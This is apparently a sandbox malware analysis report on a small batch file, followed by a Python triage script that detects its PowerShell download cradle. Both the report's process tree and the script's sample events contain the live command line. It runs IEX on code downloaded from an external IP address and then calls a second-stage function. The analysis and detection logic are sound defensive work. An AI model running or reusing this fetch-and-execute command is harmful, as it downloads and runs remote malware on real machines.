Analysis
max time kernel: 126s
max time network: 150s
platform: windows10_x64
resource: win10v200430
submitted: 20-05-2020 23:10
Static task: static1
Behavioral task: behavioral1
  Sample: 4f6a42934f34216c6420c04766ae463c.bat
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 4f6a42934f34216c6420c04766ae463c.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 4f6a42934f34216c6420c04766ae463c.bat
Size: 218B
MD5: d7072273beb15bc6b69f0d896b3c3a67
SHA1: 252dfb1b0b89545b3b431bfde9c616a85236b34d
SHA256: 172b87c827469bb03962118ed3294645fa65025b5ed9de5157c0f7d5b4ebef27
SHA512: cf89e740f3547dde583dec727b45569f2c3a5d072f01420d64f6bb6651e54dd8c3a3bac098f3fa59f61311e99d65fbde23c1d96562274e1943dc9b28ca69cfdc
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: URLs
ps1.dropper: http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  2160  1880        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  2160  WerFault.exe
  Token: SeBackupPrivilege   2160  WerFault.exe
  Token: SeDebugPrivilege    2160  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  2160  WerFault.exe (14 events, all from this process)
Processes
1. C:\Windows\system32\cmd.exe (PID 1628)
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4f6a42934f34216c6420c04766ae463c.bat"
  2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1880)
     C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c');Invoke-EPKZRFQOIDB;Start-Sleep -s 10000"
    3. C:\Windows\SysWOW64\WerFault.exe (PID 2160)
       C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 704
       - Program crash
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious behavior: EnumeratesProcesses
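The process tree above is the whole technique: the 218-byte batch file does nothing but launch 32-bit PowerShell with a download cradle (IEX of a script fetched over plain HTTP from the extracted ps1.dropper URL), call Invoke-EPKZRFQOIDB (a function that only exists once that script has been evaluated), and then sleep for 10000 seconds to keep the host process alive. The WerFault.exe child reports on PID 1880 (pid_target powershell.exe), so the PowerShell process crashed and the second stage may not have run to completion in this sandbox. The following is an added example of detection logic for this chain, not part of the sandbox report: a Python triage script run over process-creation events. The three events are constructed from the report's own PIDs, images and command lines; the parent PID 1000 for cmd.exe and the fourth, benign PowerShell event are assumptions.

```python
import re

# Pieces of a one-line PowerShell download cradle. IEX/Invoke-Expression applied
# to a WebClient Download* call is the core pattern; the rest are corroborating
# indicators taken from the command line in the report above.
CRADLE_RE = re.compile(
    r"(?:\bIEX\b|Invoke-Expression)\s*\(\s*New-Object\s+(?:System\.)?Net\.WebClient\s*\)"
    r"\s*\.\s*Download(?:String|Data|File)\s*\(",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"();]+", re.IGNORECASE)
SLEEP_RE = re.compile(r"Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.IGNORECASE)
INVOKE_RE = re.compile(r"\bInvoke-([A-Za-z][A-Za-z0-9]*)\b")
WERFAULT_RE = re.compile(r"WerFault\.exe\b.*?-p\s+(\d+)", re.IGNORECASE)
BAT_RE = re.compile(r'"([^"]+\.bat)"', re.IGNORECASE)


def analyze_powershell(cmdline):
    """Return the cradle indicators found in one PowerShell command line."""
    invoked = [n for n in INVOKE_RE.findall(cmdline) if n.lower() != "expression"]
    sleep = SLEEP_RE.search(cmdline)
    return {
        "cradle": bool(CRADLE_RE.search(cmdline)),
        "urls": URL_RE.findall(cmdline),
        # Verb-Noun names with no lowercase letters are not built-in cmdlets; they
        # are functions the downloaded script is expected to define (stage 2).
        "stage2_functions": [n for n in invoked if not any(c.islower() for c in n)],
        "sleep_seconds": int(sleep.group(1)) if sleep else 0,
    }


def crashed_pids(events):
    """PIDs that WerFault.exe was spawned to report on (its -p argument)."""
    pids = set()
    for e in events:
        if e["image"].lower().endswith("werfault.exe"):
            m = WERFAULT_RE.search(e["cmdline"])
            if m:
                pids.add(int(m.group(1)))
    return pids


def triage(events):
    """Correlate Sysmon-style process-creation events (pid, ppid, image,
    cmdline) into one finding per PowerShell process running a download cradle."""
    by_pid = {e["pid"]: e for e in events}
    crashed = crashed_pids(events)
    findings = []
    for e in events:
        if not e["image"].lower().endswith("powershell.exe"):
            continue
        info = analyze_powershell(e["cmdline"])
        if not info["cradle"]:
            continue
        parent = by_pid.get(e["ppid"], {"image": "", "cmdline": ""})
        bat = BAT_RE.search(parent["cmdline"])
        findings.append({
            "pid": e["pid"],
            "parent_image": parent["image"],
            "parent_script": bat.group(1) if bat else None,
            "urls": info["urls"],
            "stage2_functions": info["stage2_functions"],
            "sleep_seconds": info["sleep_seconds"],
            # A crash of the cradle host means stage 2 may not have completed.
            "crashed": e["pid"] in crashed,
        })
    return findings


# Constructed events reproducing the report's process tree (PIDs, images and
# command lines are the report's); the cmd.exe parent PID 1000 and the benign
# fourth event are assumptions added to show what is and is not flagged.
SAMPLE_EVENTS = [
    {"pid": 1628, "ppid": 1000, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4f6a42934f34216c6420c04766ae463c.bat"'},
    {"pid": 1880, "ppid": 1628,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe '
                 '"IEX (New-Object System.Net.WebClient).DownloadString('
                 "'http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c');"
                 'Invoke-EPKZRFQOIDB;Start-Sleep -s 10000"')},
    {"pid": 2160, "ppid": 1880, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 704"},
    {"pid": 2400, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-Service | Where-Object Status -eq Running"'},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run stand-alone, it reports exactly one finding: PID 1880, launched from the .bat via cmd.exe, with the dropper URL, the stage-2 function name EPKZRFQOIDB, the 10000-second sleep, and crashed set to True because of the WerFault.exe -p 1880 event; the benign PowerShell event produces nothing. The URL and Invoke- name are what you would pivot on (block the host, hunt for other command lines calling the same random function), and the crash flag is the caveat: absence of further network or file activity in the report does not mean the payload is harmless.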